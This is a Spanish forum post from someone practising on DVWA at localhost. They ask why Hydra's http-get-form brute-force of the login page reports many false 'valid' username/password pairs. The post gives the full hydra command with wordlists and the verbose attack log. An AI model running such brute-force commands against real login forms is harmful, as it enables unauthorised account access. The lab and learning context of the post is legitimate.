Autor
lo que pasa es lo siguiente hago una sintaxis asi:
Código:
hydra -vV -L lista.txt -P lista.txt -f -o found 127.0.0.1 http-get-form "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect"
con esto me devolveria en modo detallado el user y pass que se encuentran en wordlist lista.txt me dara la salida del archivo found el host es 127.0.0.1 http-get-form (el modulo) "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect" <<<--- esta es una regla que puedes ir creando segun la explicacion de hydra en.... hydra -U http-get-form
le puse username , password y login ... ya que son los que vienen en el formulario real de la web en este caso es una aplicacion vulnerable dvwa
entonces me un restultado asi...
Código:
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-13 02:30:54
[DATA] 16 tasks, 1 server, 49 login tries (l:7/p:7), ~3 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 49 [child 0]
[80][www-form] host: 127.0.0.1 login: admin password: user
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "user" - 2 of 49 [child 1]
[80][www-form] host: 127.0.0.1 login: admin password: admin
[80][www-form] host: 127.0.0.1 login: admin password: xd
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd" - 3 of 49 [child 2]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 4 of 49 [child 3]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "chulo" - 5 of 49 [child 4]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "preciosa" - 6 of 49 [child 5]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd5" - 7 of 49 [child 6]
[80][www-form] host: 127.0.0.1 login: admin password: password
[ATTEMPT] target 127.0.0.1 - login "user" - pass "admin" - 8 of 49 [child 7]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "user" - 9 of 49 [child 8]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd" - 10 of 49 [child 9]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - 11 of 49 [child 10]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "chulo" - 12 of 49 [child 11]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "preciosa" - 13 of 49 [child 12]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd5" - 14 of 49 [child 13]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "admin" - 15 of 49 [child 14]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "user" - 16 of 49 [child 15]
[80][www-form] host: 127.0.0.1 login: admin password: preciosa
[80][www-form] host: 127.0.0.1 login: admin password: xd5
[80][www-form] host: 127.0.0.1 login: user password: xd
[80][www-form] host: 127.0.0.1 login: user password: admin
[80][www-form] host: 127.0.0.1 login: user password: user
[80][www-form] host: 127.0.0.1 login: user password: chulo
[80][www-form] host: 127.0.0.1 login: user password: password
[80][www-form] host: 127.0.0.1 login: xd password: admin
[80][www-form] host: 127.0.0.1 login: user password: preciosa
[80][www-form] host: 127.0.0.1 login: user password: xd5
[80][www-form] host: 127.0.0.1 login: xd password: user
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-13 02:30:54
es decir yo se que el user es : admin y la pass es : password
pero quiero saber por que si dice: 1 of 1 target successfuly completed, 1 valid password found
por que no me muestra solo el que es y no todos....
intente quitandole el modo detallado -vV o -v y nada sigue pasando lo mismo
alguien me podria decir que pasa que puedo hacer? para que solo salga la password y usuario correctos y no todas la de la lista
En línea
